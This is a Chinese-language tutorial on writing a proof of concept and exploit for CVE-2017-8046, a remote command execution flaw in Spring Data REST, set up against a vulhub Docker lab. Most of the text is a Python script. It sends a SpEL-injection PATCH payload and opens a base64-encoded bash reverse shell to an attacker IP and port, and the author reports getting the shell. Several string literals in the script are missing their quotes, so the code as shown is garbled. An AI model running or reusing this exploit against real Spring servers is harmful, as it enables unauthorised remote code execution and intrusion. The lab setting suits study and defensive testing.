CVE-2017-8046 Spring Data Rest 远程命令执行漏洞
本文只要是学习poc、exp的编写,对于漏洞的原理不进行深入的介绍。
环境搭建
cd vulhub-master/spring/CVE-2017-8046 docker-compose up -d
漏洞原理
漏洞的原因是对PATCH方法处理不当,导致攻击者能够利用JSON数据造成RCE。本质还是因为Spring的SPEL解析导致的RCE。
影响版本
-
Spring Data REST组件的2.6.9 and 3.0.9之前的版本(不包含2.6.9和3.0.9 ) Spring Boot (如果使用了Spring Data REST模块)的1.5.9 和 2.0 M6之前的版本
POC、EXP
import base64 import os import requests import json header = { "Content-Type": "application/json-patch+json" } path = "/customers/1" def poc(url): cmd = "touch /tmp/success" cmdUnicode = strToAscii(cmd) payload=f"{ cmdUnicode}".replace("[", "{").replace("]", "}") data=[{ "op": "replace", "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{ payload}))/lastname", "value": "vulhub" }] payloadData=json.dumps(data) html=requests.patch(url=url+path,headers=header,data=payloadData).text number = os.path.basename(__file__).split(.)[0] if html.find("EL1010E: Property")>0: outPocTrue(number, url, path) else: outPocFalse(number, url, path) def exp(url,lhost,lport): cmd = bash(lhost,lport) cmdUnicode = strToAscii(cmd) payload = f"{ cmdUnicode}".replace("[", "{").replace("]", "}") data = [{ "op": "replace", "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{ payload}))/lastname", "value": "vulhub" }] payloadData = json.dumps(data) requests.patch(url=url + path, headers=header, data=payloadData).text def true_url(url): if url[-1] == /: url=url[0:-1] if url.find("http"): url = http:// + url return url def bash(ip,port): m = fbash -i >& /dev/tcp/{ ip}/{ port} 0>&1 s = str(base64.b64encode(m.encode(utf-8)), utf-8) bash_code = bash -c {echo, + s + }|{base64,-d}|{bash,-i} return bash_code def strToAscii(code): poc=[] for i in code: poc.append(ord(i)) return poc def outPocTrue(number,url,path): print(f"[+] The VULN { number} exists, path is : { url}{ path}") def outPocFalse(number,url,path): print(f"[-] The VULN { number} no exists") def bash64ToAscii(code): poc = ${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s) % ord(code[0]) for ch in code[1:]: poc += .concat(T(java.lang.Character).toString(%s)) % ord(ch) poc += )} return poc url= true_url("192.168.29.129:8080") ip=192.168.29.135 port=6666 poc(url) exp(url,ip,port)
运行之后,成功验证了漏洞的存在,并且成功反弹了shell